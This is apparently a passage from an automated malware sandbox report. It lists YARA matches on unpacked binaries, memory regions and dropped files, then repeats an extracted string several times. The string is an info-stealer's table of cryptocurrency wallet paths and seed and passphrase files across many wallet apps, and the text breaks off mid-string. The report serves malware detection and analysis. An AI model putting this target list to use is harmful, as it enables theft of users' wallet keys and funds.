                            Source: Yara matchFile source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPED
                            Source: Yara matchFile source: 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Source: Yara matchFile source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.5c90e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.5c90e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.3.u48o.0.exe.5cc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: Jaxx Liberty
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia 